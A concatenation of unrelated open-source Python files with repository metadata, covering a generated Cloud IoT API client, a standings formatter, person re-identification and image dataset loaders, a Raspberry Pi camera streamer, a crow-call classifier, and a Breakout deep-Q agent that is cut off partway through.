flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def GetIamPolicy(self, request, global_params=None):
"""Gets the access control policy for a resource.
Returns an empty policy if the resource exists and does not have a policy
set.
Args:
request: (CloudiotProjectsLocationsRegistriesGetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('GetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
GetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:getIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.getIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:getIamPolicy',
request_field=u'getIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def List(self, request, global_params=None):
"""Lists device registries.
Args:
request: (CloudiotProjectsLocationsRegistriesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceRegistriesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/registries',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesListRequest',
response_type_name=u'ListDeviceRegistriesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesPatchRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def SetIamPolicy(self, request, global_params=None):
"""Sets the access control policy on the specified resource. Replaces any.
existing policy.
Args:
request: (CloudiotProjectsLocationsRegistriesSetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('SetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:setIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.setIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:setIamPolicy',
request_field=u'setIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesSetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
If the resource does not exist, this will return an empty set of
permissions, not a NOT_FOUND error.
Args:
request: (CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestIamPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:testIamPermissions',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.testIamPermissions',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:testIamPermissions',
request_field=u'testIamPermissionsRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest',
response_type_name=u'TestIamPermissionsResponse',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = u'projects_locations'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
|
[
"[email protected]"
] | |
adce83a22777b2ebe8fe30f555671f0d10599045
|
580a43c9bc8cc5cd5db745155e0721b5ba1664f6
|
/S3-Notifications-Lambda/output.py
|
8df38b8094739a3b3654a3327667dd092c71eb2e
|
[
"Apache-2.0"
] |
permissive
|
Jardo72/AWS-Sandbox
|
e10e750a955701cb341b4133544f9e081378f37f
|
b0402295e9097027c12b1954df967a0ac4d5163d
|
refs/heads/master
| 2023-07-08T21:02:30.360536 | 2023-06-30T09:07:23 | 2023-06-30T09:07:23 | 216,329,685 | 1 | 1 |
Apache-2.0
| 2023-05-23T04:57:47 | 2019-10-20T08:21:58 |
HCL
|
UTF-8
|
Python
| false | false | 1,983 |
py
|
#
# Copyright 2021 Jaroslav Chmurny
#
# This file is part of AWS Sandbox.
#
# AWS Sandbox is free software developed for educational purposes. It
# is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicationlicationlicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Sequence
from model import StandingsEntry
def _column_headings() -> str:
return ' GP RW OW OL RL GF:GA PTS\n'
def _standings_entries(entries: Sequence[StandingsEntry]) -> str:
result = ''
for index, single_entry in enumerate(entries):
rank = index + 1
result += f'{rank:2}.{single_entry.team} '
result += f'{single_entry.overall_game_count:2d} '
result += f'{single_entry.regulation_win_count:2d} '
result += f'{single_entry.overtime_win_count:2d} '
result += f'{single_entry.overtime_loss_count:2d} '
result += f'{single_entry.regulation_loss_count:2d} '
result += f'{single_entry.goals_for:2d}:'
result += f'{single_entry.goals_against:2d} '
result += f'{single_entry.points:3d}\n'
return result
def _legend() -> str:
return """
Legend
GP .... Games Played
RW .... Regulation Wins
OW .... Overtime + Shootout Wins
OL .... Overtime + Shootout Losses
RL .... Regulation Losses
GF .... Goals For
GF .... Goals Against
PTS ... Points
"""
def print_standings(entries: Sequence[StandingsEntry]) -> str:
return _column_headings() + _standings_entries(entries) + _legend()
|
[
"[email protected]"
] | |
77f88b6cb7d386f11e85007e8f911227e7ffdaa8
|
dea9f25321014fb3a374846d4d5491175d0b09f6
|
/assignment14/ass14_1.py
|
4690479dbd447aa9498b90131144d516f7ce8e9e
|
[] |
no_license
|
malay190/Assignment_Solutions
|
9a994a510ab7ba61d1d8d8c059c1ecafd3a7e049
|
48ec569e40fa4094a88739407f9fbe4f6dae1e77
|
refs/heads/master
| 2020-03-20T03:50:27.583251 | 2018-07-09T15:53:54 | 2018-07-09T15:53:54 | 137,161,356 | 0 | 3 | null | 2019-10-15T04:44:26 | 2018-06-13T04:10:36 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 196 |
py
|
#Q.1- Write a Python program to read last n lines of a file
n=int(input("enter the last n lines you want to read:"))
f=open('test.txt')
content=f.readlines()
while n>0:
print(content[-n])
n-=1
|
[
"[email protected]"
] | |
ae06705854bfb94e12685e6ba2471012f9fd8daf
|
fa075e513471921afc02cf6b3ca39dfe4e73527c
|
/data/datasets/image/dukemtmcreid.py
|
be51ab0bda286a3be2c4d26ff9623e0c99f2af27
|
[
"MIT"
] |
permissive
|
Yinsongxu/MVMP_MFFN
|
99bbcadbea6a76ccd177ff94aa102f041cc8134e
|
2024197ca1f1d7f2f52ccbce08eb85dd282de70d
|
refs/heads/main
| 2023-05-05T20:29:00.041869 | 2021-05-30T09:23:58 | 2021-05-30T09:23:58 | 372,161,994 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,530 |
py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import sys
import os
import os.path as osp
import glob
import re
from data.datasets import ImageDataset
class DukeMTMCreID(ImageDataset):
"""DukeMTMC-reID.
Reference:
- Ristani et al. Performance Measures and a Data Set for Multi-Target, Multi-Camera Tracking. ECCVW 2016.
- Zheng et al. Unlabeled Samples Generated by GAN Improve the Person Re-identification Baseline in vitro. ICCV 2017.
URL: `<https://github.com/layumi/DukeMTMC-reID_evaluation>`_
Dataset statistics:
- identities: 1404 (train + query).
- images:16522 (train) + 2228 (query) + 17661 (gallery).
- cameras: 8.
"""
dataset_dir = 'dukemtmc-reid'
dataset_url = 'http://vision.cs.duke.edu/DukeMTMC/data/misc/DukeMTMC-reID.zip'
def __init__(self, root='', **kwargs):
self.root = osp.abspath(osp.expanduser(root))
self.dataset_dir = self.root
#self.download_dataset(self.dataset_dir, self.dataset_url)
self.train_dir = osp.join(self.dataset_dir, 'DukeMTMC-reID/bounding_box_train')
self.query_dir = osp.join(self.dataset_dir, 'DukeMTMC-reID/query')
self.gallery_dir = osp.join(self.dataset_dir, 'DukeMTMC-reID/bounding_box_test')
required_files = [
self.dataset_dir,
self.train_dir,
self.query_dir,
self.gallery_dir
]
self.check_before_run(required_files)
train = self.process_dir(self.train_dir, relabel=True)
query = self.process_dir(self.query_dir, relabel=False)
gallery = self.process_dir(self.gallery_dir, relabel=False)
super(DukeMTMCreID, self).__init__(train, query, gallery, **kwargs)
def process_dir(self, dir_path, relabel=False):
img_paths = glob.glob(osp.join(dir_path, '*.jpg'))
pattern = re.compile(r'([-\d]+)_c(\d)')
pid_container = set()
for img_path in img_paths:
pid, _ = map(int, pattern.search(img_path).groups())
pid_container.add(pid)
pid2label = {pid:label for label, pid in enumerate(pid_container)}
data = []
for img_path in img_paths:
pid, camid = map(int, pattern.search(img_path).groups())
assert 1 <= camid <= 8
camid -= 1 # index starts from 0
if relabel: pid = pid2label[pid]
data.append((img_path, pid, camid))
return data
|
[
"[email protected]"
] | |
62d885e2dfc1f0c0f22c2711cb0bcfabeb0641b3
|
0942ec9cdda81f754d05ae9893605769ed5c1111
|
/flask-video-streaming/camera_pi.py
|
f94a07a7875d2c5f6778403d01ea02da3986608e
|
[
"MIT"
] |
permissive
|
sourceperl/rpi.webcam.pi3
|
f9fa061bc05bab9720c9e372c96f65e431ad5673
|
ea8559ca93f771250961a63fbe0f7acc3a7a2338
|
refs/heads/master
| 2020-12-25T14:38:24.234521 | 2016-07-21T14:56:01 | 2016-07-21T14:56:01 | 63,687,773 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,607 |
py
|
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.daemon = True
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (640, 480)
camera.hflip = True
camera.vflip = True
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
|
[
"[email protected]"
] | |
50509f1fcaee6a8db649657d24ee5a29044b19e6
|
6932a9ae700a623f16a3aef417d0598cf6d4f389
|
/karasu_speak.py
|
c8c028b30786e6c5b67abc979a0d40f60e63f06a
|
[
"MIT"
] |
permissive
|
MuAuan/hirakegoma
|
9f1a252d913749a2c16ae5bd7a8870550048d26d
|
861879af1016c25b7a14bcabe543bfba47fd57f3
|
refs/heads/master
| 2020-04-27T20:12:25.315594 | 2019-03-24T12:38:30 | 2019-03-24T12:38:30 | 174,649,241 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,935 |
py
|
# -*- coding: utf-8 -*-
import cv2
import pyaudio
import sys
import time
import wave
import pydub
from pydub import AudioSegment
import moviepy.editor as mp
import datetime
import os
from vgg16_like import model_family_cnn
from keras.preprocessing import image
import matplotlib.pyplot as plt
import keras
import numpy as np
def prediction(imgSrc,model):
#np.random.seed(1337) # for reproducibility
img_rows,img_cols=128, 128
img = np.array(imgSrc)
img = img.reshape(1, img_rows,img_cols,3)
img = img.astype('float32')
img /= 255
t0=time.time()
y_pred = model.predict(img)
return y_pred
def karasu_responder(model,path,img_rows,img_cols):
imgSrc=[]
#for j in range(0,100000,1):
# j += 1
imgSrc = image.load_img(path, target_size=(img_rows,img_cols))
#plt.imshow(imgSrc)
#plt.pause(1)
#plt.close()
pred = prediction(imgSrc,model)
#print(pred[0])
if pred[0][0]>=0.5:
filename = "karasu-miyama_out1.wav"
print("angry")
elif pred[0][1]>=0.5:
#filename = "karasu_kero_out3.wav"
filename = "karasu-normal_out1.wav"
print("normal")
elif pred[0][2]>=0.5:
#filename = "karasu_kero_out1.wav"
filename = "karasu-others_out1.wav" #karasu-hageshii_out.wav
print("others")
return filename
num_classes = 3
img_rows,img_cols=128, 128
input_shape = (img_rows,img_cols,3)
model = model_family_cnn(input_shape, num_classes = num_classes)
# load the weights from the last epoch
model.load_weights('params_karasu-0angry-1normal-2others.hdf5', by_name=True)
print('Model loaded.')
path = "./out_test/figure.jpg"
img_rows,img_cols=128,128
s=0
while True:
if os.path.exists(path)==True:
s += 1
for j in range(0,50000000,1):
j += 1
"""
if s%3 == 0:
path="./out_test/figure_angry.jpg"
elif s%3 == 1:
path="./out_test/figure_normal.jpg"
else:
path="./out_test/figure_others.jpg"
"""
filename=karasu_responder(model,path,img_rows,img_cols)
wf = wave.open(filename, "rb")
# チャンク数を指定
CHUNK1 = 1024
#filename = "hirakegoma.wav"
wf = wave.open(filename, "rb")
# PyAudioのインスタンスを生成
p1 = pyaudio.PyAudio()
# Streamを生成
stream1 = p1.open(format=p1.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# データを1度に1024個読み取る
input1 = wf.readframes(CHUNK1)
# 実行
while stream1.is_active():
output = stream1.write(input1)
input1 = wf.readframes(CHUNK1)
if input1==b'':
os.remove(path)
break
|
[
"[email protected]"
] | |
c05ac1332910c7ae7901500da72f4923b5fc4770
|
15646d66d4452a4efa927d53dc687d78c5201ece
|
/code/datasets.py
|
e8528356752b7f77b481e2a75d2d9e7a9ea82620
|
[] |
no_license
|
wjtoth/co759-project
|
0461ba86c7e76fa90af5fb3a08af2128189de06b
|
aae54cd76a2c4c3cb84cc607625d94036a45b1a5
|
refs/heads/master
| 2021-01-25T10:06:21.818503 | 2018-11-26T20:12:18 | 2018-11-26T20:12:18 | 123,339,356 | 1 | 0 | null | 2018-04-24T19:57:57 | 2018-02-28T20:35:20 |
Python
|
UTF-8
|
Python
| false | false | 11,924 |
py
|
import os
import logging
from functools import partial
from copy import deepcopy
import torch
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
from util.partialdataset import validation_split
from util.concatdataset import ConcatDataset
from util.datasetindexingwrapper import DatasetIndexingWrapper
def create_datasets(ds_name, batch_size, test_batch_size, do_aug, no_val_set, data_root,
use_cuda, seed, num_workers, dbg_ds_size, allow_download):
ds_name = ds_name.lower()
# ----- set up specified dataset -----
if ds_name == 'mnist':
mean_std = ((0.1307,), (0.3081,))
ds = datasets.MNIST
create_ds_func = partial(create_mnist_cifar_datasets, ds=ds, download=allow_download, val_pct=1.0/6.0,
data_dir='data/' + ds_name)
num_classes = 10
elif ds_name == 'cifar10':
mean_std = ((0.49139968, 0.48215841, 0.44653091), (0.24703223, 0.24348513, 0.26158784))
ds = datasets.CIFAR10
create_ds_func = partial(create_mnist_cifar_datasets, ds=ds, download=allow_download, val_pct=0.2,
data_dir='data/' + ds_name)
num_classes = 10
elif ds_name == 'cifar100':
# mean_std = ((0.49139968, 0.48215841, 0.44653091), (0.24703223, 0.24348513, 0.26158784))
mean_std = ((129.30416561 / 255, 124.0699627 / 255, 112.43405006 / 255),
(68.1702429 / 255, 65.39180804 / 255, 70.41837019 / 255))
ds = datasets.CIFAR100
create_ds_func = partial(create_mnist_cifar_datasets, ds=ds, download=allow_download, val_pct=0.2,
data_dir='data/' + ds_name)
num_classes = 100
elif ds_name == 'svhn':
mean_std = ((0.4309, 0.4302, 0.4463), (0.1965, 0.1983, 0.1994))
create_ds_func = partial(create_svhn_datasets, download=allow_download, val_pct=0.1, data_dir='data/' + ds_name)
num_classes = 10
elif ds_name == 'imagenet':
mean_std = ((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
root_dir = '/media/ssdpro/data/imagenet/ilsvrc14_256_ims' if not data_root else data_root
create_ds_func = partial(create_imagenet_datasets, data_root_dir=root_dir)
num_classes = 1000
else:
raise NotImplementedError("'{}' dataset is not supported".format(ds_name))
train_loader, val_loader, test_loader = \
create_ds_func(batch_size, use_cuda, seed, mean_std=mean_std, do_aug=do_aug,
create_val=not no_val_set, num_workers=num_workers, test_batch_size=test_batch_size,
dbg_ds_size=dbg_ds_size)
return train_loader, val_loader, test_loader, num_classes
def create_mnist_cifar_datasets(batch_size, use_cuda, seed, ds=None, mean_std=None, val_pct=0.1, data_dir='',
download=False, test_batch_size=None, do_aug=False, create_val=True,
num_workers=2, dbg_ds_size=0):
kwargs = {}
if seed != -1:
torch.manual_seed(seed)
if use_cuda:
if seed != -1:
torch.cuda.manual_seed(seed)
kwargs = {'num_workers': num_workers, 'pin_memory': True}
if mean_std is None:
train_set = ds(data_dir, train=True, download=download, transform=transforms.ToTensor())
mu = train_set.train_data.mean(axis=(0, 1, 2)) / 255
sig = train_set.train_data.std(axis=(0, 1, 2)) / 255
mean_std = (mu, sig)
print('train_data shape:', train_set.train_data.size(), 'mean:', mean_std[0], 'std:', mean_std[1])
del train_set
train_transforms = [transforms.ToTensor(),
transforms.Normalize(mean_std[0], mean_std[1])]
test_transforms = deepcopy(train_transforms)
if do_aug:
train_transforms = [transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()] + train_transforms
train_ds = ds(data_dir, train=True, download=download, transform=transforms.Compose(train_transforms))
if create_val:
total_len = len(train_ds)
val_ds = ds(data_dir, train=True, download=False, transform=transforms.Compose(test_transforms))
train_ds, _ = validation_split(train_ds, val_share=val_pct)
_, val_ds = validation_split(val_ds, val_share=val_pct)
assert len(train_ds) + len(val_ds) == total_len
else:
val_ds = None
test_ds = ds(data_dir, train=False, download=download, transform=transforms.Compose(test_transforms))
if test_batch_size is None or test_batch_size == 0:
test_batch_size = batch_size
if dbg_ds_size > 0:
train_ds, _ = validation_split(train_ds, val_share=(1.0 - float(dbg_ds_size) / len(train_ds)))
logging.debug('DEBUG: setting train dataset size = {}'.format(len(train_ds)))
train_ds = DatasetIndexingWrapper(train_ds)
train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=True, **kwargs)
# train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=False, **kwargs) # TODO: REMOVE THIS
val_loader = DataLoader(val_ds, batch_size=test_batch_size, shuffle=False, **kwargs) if create_val else None
test_loader = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False, **kwargs)
return train_loader, val_loader, test_loader
def create_svhn_datasets(batch_size, use_cuda, seed, mean_std=None, val_pct=0.1, data_dir='', download=False,
test_batch_size=None, do_aug=False, create_val=True, num_workers=2, dbg_ds_size=0):
kwargs = {}
if seed != -1:
torch.manual_seed(seed)
if use_cuda:
if seed != -1:
torch.cuda.manual_seed(seed)
kwargs = {'num_workers': num_workers, 'pin_memory': True}
if mean_std is None:
logging.info('computing mean and std of SVHN dataset -- pre-specify these to improve performance')
train_data = datasets.SVHN(data_dir, split='train', download=download, transform=transforms.ToTensor())
extra_data = datasets.SVHN(data_dir, split='extra', download=download, transform=transforms.ToTensor())
train_set = ConcatDataset([train_data, extra_data], shuffle=False)
mean, std = compute_mean_std_per_channel(train_set)
mean_std = (mean, std)
print('train_data shape: {}x{}'.format(len(train_set), train_set[0][0].size()), 'mean:', mean, 'std:', std)
del train_set, extra_data
base_transforms = [transforms.Resize((40, 40)),
transforms.ToTensor(),
transforms.Normalize(mean_std[0], mean_std[1])]
# if do_aug:
# train_transforms = [transforms.RandomCrop(32, padding=4),
# transforms.RandomHorizontalFlip()] + deepcopy(base_transforms)
# assert not do_aug, 'data augmentation not supported for SVHN'
train_transforms = transforms.Compose(deepcopy(base_transforms))
test_transforms = transforms.Compose(base_transforms)
train_ds = ConcatDataset([datasets.SVHN(data_dir, split='train', download=download, transform=train_transforms),
datasets.SVHN(data_dir, split='extra', download=download, transform=train_transforms)])
if create_val:
val_ds = ConcatDataset([datasets.SVHN(data_dir, split='train', download=False, transform=test_transforms),
datasets.SVHN(data_dir, split='extra', download=False, transform=test_transforms)])
train_ds, _ = validation_split(train_ds, val_share=val_pct, shuffle_data=True)
_, val_ds = validation_split(val_ds, val_share=val_pct, shuffle_data=train_ds.index_mapping)
else:
val_ds = None
test_ds = datasets.SVHN(data_dir, split='test', download=download, transform=test_transforms)
if test_batch_size is None or test_batch_size == 0:
test_batch_size = batch_size
if dbg_ds_size > 0:
train_ds, _ = validation_split(train_ds, val_share=(1.0 - float(dbg_ds_size) / len(train_ds)))
logging.debug('DEBUG: setting train dataset size = {}'.format(len(train_ds)))
train_ds = DatasetIndexingWrapper(train_ds)
train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=True, **kwargs)
val_loader = DataLoader(val_ds, batch_size=test_batch_size, shuffle=False, **kwargs) if create_val else None
test_loader = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False, **kwargs)
return train_loader, val_loader, test_loader
def create_imagenet_datasets(batch_size, use_cuda, seed, mean_std=None, data_root_dir='', test_batch_size=None,
create_val=True, do_aug=True, num_workers=2, dbg_ds_size=0):
kwargs = {}
if seed != -1:
torch.manual_seed(seed)
if use_cuda:
if seed != -1:
torch.cuda.manual_seed(seed)
kwargs = {'num_workers': num_workers, 'pin_memory': True}
assert mean_std is not None, 'cannot compute mean_std on imagenet, must specify it beforehand'
# note: this assumes that ImageNet images have already been resized to have short edge = 256 when loaded
base_transforms = [transforms.ToTensor(),
transforms.Normalize(mean_std[0], mean_std[1])]
# train transforms = random crop to 224, horizontal flip, normalize mean and stddev
train_transforms = [] if not do_aug else [transforms.RandomCrop(224, 0),
transforms.RandomHorizontalFlip()]
train_transforms = train_transforms + deepcopy(base_transforms)
# test transforms = center crop, normalize mean and stddev
test_transforms = [transforms.CenterCrop(224)] + base_transforms
train_dir = os.path.join(data_root_dir, 'train')
val_dir = os.path.join(data_root_dir, 'val')
train_ds = datasets.ImageFolder(train_dir, transform=transforms.Compose(train_transforms))
if create_val:
val_pct = 0.1
val_ds = datasets.ImageFolder(train_dir, transform=transforms.Compose(test_transforms))
train_ds, _ = validation_split(train_ds, val_share=val_pct, shuffle_data=True)
_, val_ds = validation_split(val_ds, val_share=val_pct, shuffle_data=train_ds.index_mapping)
else:
val_ds = None
test_ds = datasets.ImageFolder(val_dir, transform=transforms.Compose(test_transforms))
# test_ds = datasets.ImageFolder(data_root_dir+'/test', transform=transforms.Compose(test_transforms))
if dbg_ds_size > 0:
train_ds, = validation_split(train_ds, val_share=(1.0 - float(dbg_ds_size) / len(train_ds)))
logging.warning('DEBUG: setting train dataset size = {}'.format(len(train_ds)))
train_ds = DatasetIndexingWrapper(train_ds)
if test_batch_size is None or test_batch_size == 0:
test_batch_size = batch_size
train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=True, **kwargs)
val_loader = DataLoader(val_ds, batch_size=test_batch_size, shuffle=False, **kwargs) if create_val else None
test_loader = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False, **kwargs)
return train_loader, val_loader, test_loader
def compute_mean_std_per_channel(dataset):
assert len(dataset) > 0
assert dataset[0][0].dim() == 3, 'dataset has {} dimensions, but needs 3'.format(dataset[0][0].dim())
imsize = dataset[0][0].size()
sum1, sum2, count = torch.FloatTensor(imsize[0]).zero_(), torch.FloatTensor(imsize[0]).zero_(), 0
# lazy two-pass version
for i in range(len(dataset)):
img = dataset[i][0]
count += img.numel() / img.size(0)
sum1 += img.sum(dim=2).sum(dim=1)
mean = sum1 / count
mus = mean.unsqueeze(1).unsqueeze(2)
for i in range(len(dataset)):
img = dataset[i][0]
sum2 += ((img - mus) * (img - mus)).sum(dim=2).sum(dim=1)
std = torch.sqrt(sum2 / (count - 1))
return mean, std
|
[
"[email protected]"
] | |
b78e6bea6c9302563091f707c926e77f8c3a6ec1
|
7737fd9eacc1a8b8d8b14a3ebca4e86c174ff8b4
|
/gist/cuatro.py
|
54ec61ec1642f72076b989fa7e82c510f366d92c
|
[] |
no_license
|
davidgjordan/gym_tensorflow
|
e82a021ee329e8f6430ff52e6ec36444e842dcec
|
d97070cfd8079356c77f079d821c0ba5aebcaabc
|
refs/heads/master
| 2018-09-23T17:16:20.968122 | 2018-06-27T18:55:00 | 2018-06-27T18:55:00 | 117,039,839 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,149 |
py
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import numpy as np
import gym
from keras.models import Model
from keras.layers import Input, Dense, BatchNormalization, PReLU, Dropout
from keras.regularizers import l2
from keras.optimizers import RMSprop
from keras.engine import Layer
from keras import backend as K
env_name = 'Breakout-ram-v0'
_actions = (1, 4, 5)
def main():
env = gym.make(env_name)
#env = gym.wrappers.Monitor(env, env_name + '_history')
n_max_episode = 10000
play_length = 2**30
warmingup_episode = 100
memory_length = 1024 * 256
gamma = 0.99
epsilon = 1.0
epsilon_decay = 0.998
epsilon_min = 0.1
learning_rate = 0.0001
n_units = (128 * 8, 1024, 1024, len(_actions))
agent = Agent(n_units, learning_rate, gamma, memory_length)
for n_episode in range(n_max_episode):
play(env, agent, play_length, epsilon)
agent.train()
if n_episode > warmingup_episode:
epsilon = (epsilon - epsilon_min) * epsilon_decay + epsilon_min
env.close()
def play(env, agent, play_length, epsilon=0):
total_reward = 0.0
observation = env.reset()
ss = preprocess(observation)
for n_frame in range(play_length):
s = ss
if n_frame < 20 or np.random.uniform() < epsilon:
action = np.random.choice(len(_actions))
else:
action = agent.predict(s)
observation, reward, done, info = env.step(_actions[action])
total_reward += reward
ss = preprocess(observation)
agent.memory_append((s, action, np.sign(reward), done, ss))
if done:
break
return total_reward
def preprocess(x):
return np.asarray([(n >> i) & 1 for n in x for i in range(8)], dtype=np.bool)
class Agent(object):
def __init__(self, n_units, sgd_lr, gamma, memory_length):
nD, nV = n_units[0], n_units[-1]
Wreg_l2 = 1e-6
drop_proba = 0.2
self.gamma = gamma
self.train_batch_size = 128
self.mem = PlayMemory(memory_length, nD)
self.train_count = 0
s = Input(shape=(nD,))
a = Input(shape=(1,), dtype='uint8')
z = s
for nH in n_units[1:-1]:
z = Dense(nH, W_regularizer=l2(Wreg_l2))(z)
z = BatchNormalization()(z)
z = PReLU()(z)
z = Dropout(drop_proba)(z)
z = Dense(nV + 1, W_regularizer=l2(Wreg_l2), init='zero')(z)
self.Q_model = Model(input=s, output=DuelQ()(z))
self.train_model = Model(input=[s, a], output=DuelQa()([z, a]))
self.train_model.compile(
loss=lambda y_true, y_pred: K.sqrt((y_true - y_pred)**2 + 1) - 1,
optimizer=RMSprop(lr=sgd_lr))
def train(self):
m = self.mem
n = len(m)
if n < 16384 or m.add_count < 1024:
return
m.add_count = 0
self.train_count += 1
for i in range(0, n, self.train_batch_size):
j = i + self.train_batch_size
m.Q[i:j] += self.gamma * np.max(self.Q_model.predict_on_batch(
m.S[i:j, 1]), axis=1, keepdims=True) * (m.T[i:j] == False)
m.Q[i:j] /= 2
idx = np.random.permutation(n)
for n in range(self.train_batch_size, n, self.train_batch_size):
i = idx[n - self.train_batch_size:n]
self.train_model.train_on_batch(
[m.S[i, 0], m.A[i]], m.R[i] + m.Q[i])
def predict(self, s):
return np.argmax(self.Q_model.predict_on_batch(s[np.newaxis]).squeeze())
